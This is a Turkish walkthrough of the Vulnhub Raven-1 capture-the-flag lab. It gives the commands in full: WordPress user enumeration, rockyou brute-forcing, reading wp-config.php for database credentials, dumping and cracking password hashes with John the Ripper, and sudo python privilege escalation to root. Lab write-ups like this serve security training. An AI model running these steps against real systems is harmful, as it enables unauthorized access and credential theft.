Vulnhub - Raven [TR]

RAVEN-1 | VULNHUB [Turkish]

  • İndir: Raven-1

  • İlk olarak ayağa kaldırdığımız RAVEN Sunucusunun IP adresini, netdiscover kullanarak öğreniyoruz.

1
$ netdiscover -r 192.168.26.1
  • host: 192.168.26.130
  • Tarayıcı üzerinden adrese gittiğimizde web uygulamasının çalıştırıldığını görüyoruz.

  • Nmap kullanarak açık portları, bu portlar üzerinde çalışan servislerin versiyonlarını tespit etmek ve zafiyet taraması yapılmasını istiyoruz.

    1
    $ nmap -T4 -A -sV --script vuln 192.168.26.130
  • Nmap çıktısını incelediğimizde uygulama üzerinde wordpress kurulu olduğunu görüyoruz.

  • Wpscan aracını kullanarak wordpress uygulamasındaki kullanıcıları listelemeyi deniyoruz.
1
$ wpscan --url http://192.168.26.130/wordpress --enumerate u
  • Elde ettiğimiz kullanıcı bilgilerini usernames.txt dosyasına yazarak sonraki aşamalarda kullanmak üzere kaydediyoruz.

  • Wpscan aracı ile kali linux’da default olarak hazır gelen ve oldukça kapsamlı olan rockyou wordlistini kullanarak brute force yöntemiyle kullanıcıların parolalarını tespit etmeye çalışıyoruz.

    1
    $ wpscan --url http://192.168.26.130/wordpress/ -U usernames.txt  -P /usr/share/wordlists/rockyou.txt
  • Yalnızca michael kullanıcısına ait parolayı elde edebildik.

    • user: michael
    • password: michael
  • Nmap çıktısını incelediğimizde SSH Portunun açık olduğunu görüyoruz. SSH bağlantısı ile giriş yapmayı deneyeceğiz.
    1
    $ ssh [email protected]
  • Bağlantı başarılı. Sunucu üzerindeki dosyaların keşfine başlıyoruz.
    • /var/www altında flag2 txt dosyasını bulduk.
    • /var/www/html/wordpress/ dizininde wordpress’e ait konfigürasyon bilgilerinin barındırılığı wp-config.php dosyasını buluyoruz.
1
$ cat wp-config.php
  • Dosyayı incelediğimizde MySQL veritabanına ait username ve password bilgilerini açık bir şekilde görebiliyoruz.
  • Elde ettiğimiz username ve password bilgileriyle MySQL üzerinde authanticate oluyoruz.
1
2
3
4
5
$ mysql -u root -p
mysql> show databases;
mysql> use wordpress;
mysql> show tables;
mysql> select * from wp_users;
  • Michael kullanıcısıyla SSH üzerinden giriş yapmıştık. Bu sefer steven kullanıcısına ait parola bilgisini elde ederek steven kullanıcısına geçiş yapmayı deneyeceğiz.
  • Steven kullanıcısına ait password hash’i hash.txt dosyasına yazarak John the Ripper aracıyla kırmayı deneyeceğiz.
    1
    2
    $ john hash.txt
    $ john --show hash.txt
  • Steven kullanıcısına ait pink84 parolasını elde ediyoruz.
  • Steven kullanıcısına geçiş yapmayı deniyoruz.
1
2
$ su steven
Password: pink84
  • Steven kullanıcısına başarıyla geçiş yaptık.
1
$ /bin/bash
  • Terminali daha kullanılabilir hale getirmek için bash kabuğuna geçiş yaptık.
1
$ sudo -l
1
$ sudo python -c 'import pty;pty.spawn("/bin/bash")'
  • Kontrol ettiğimizde root yetkisine başarıyla erişim sağlandığını görüyoruz.
  • Root dizinine gittiğimizde flag4 dosyasını elde ediyoruz.
  • Flag2 ve Flag4 dosyalarını elde etmiştik. Flag1 ve Flag3 dosyalarını henüz bulamadık.
  • Tarayıcı kullanarak web uygulamasının kaynak kodlarını incelediğimizde, http:/host/service.html adresinin kaynak kodundan flag1’i elde ediyoruz.
  • Yapılan keşif çalışmaları sonucunda Wp-config dosyasında bulduğumuz mysql veritabanı bilgileriyle MySQL üzerinde authenticate olarak veritabanında bulunan wp-post tablosunu listelediğimizde flag3’ü elde ediyoruz.